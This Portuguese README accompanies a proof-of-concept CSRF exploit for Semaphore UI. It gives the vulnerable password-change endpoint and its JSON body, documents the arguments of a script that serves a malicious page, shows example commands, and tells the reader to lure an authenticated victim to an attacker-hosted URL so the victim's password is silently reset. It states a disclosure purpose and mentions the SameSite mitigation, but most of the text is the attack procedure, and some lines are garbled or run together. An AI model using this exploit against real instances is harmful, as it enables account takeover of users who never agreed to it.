
Exploit de prova de conceito para CVE-2026-73292: ataque CSRF no endpoint de alteração de senha da Semaphore UI, servindo uma página maliciosa que redefine silenciosamente a senha de um usuário autenticado.
Apenas para fins educacionais e de divulgação responsável.
Esta vulnerabilidade foi reportada em GHSA-8cj9-r88m-8945 e afeta as versões do semaphoreui anteriores a 2.18.21.
O endpoint de alteração de senha do Semaphore UI não implementa nenhuma proteção contra CSRF:
semaphore) sem aplicação de SameSiteUma página maliciosa pode alterar silenciosamente a senha de qualquer usuário autenticado que a visite.
Endpoint afetado: POST /api/users/{id}/password
{"password": "newpassword", "project_id": 1}
python poc_server.py -u http://TARGET:3000 -i USER_ID [-n NEW_PASSWORD] [-p PORT]
| Argumento | Descrição | Padrão |
|---|---|---|
-u / --uri | URL base da instância do Semaphore | obrigatório |
-i / --user_id | ID do usuário alvo | obrigatório |
-n / --new_password | Senha a ser definida | passwordchanged |
-p / --port | Porta para servir a página maliciosa | 1337 |
python poc_server.py -u http://192.168.1.10:3000 -i 1 -n pwn3d -p 1337
Em seguida, envie a vítima (autenticada no Semaphore) para http://ATTACKER:1337. A senha dela é alterada imediatamente ao carregar a página.
python poc.py -u http://TARGET:3000 -i 1
http://ATTACKER:1337/api/users/1/password retornando HTTP 204SameSite=Strict no cookie de sessão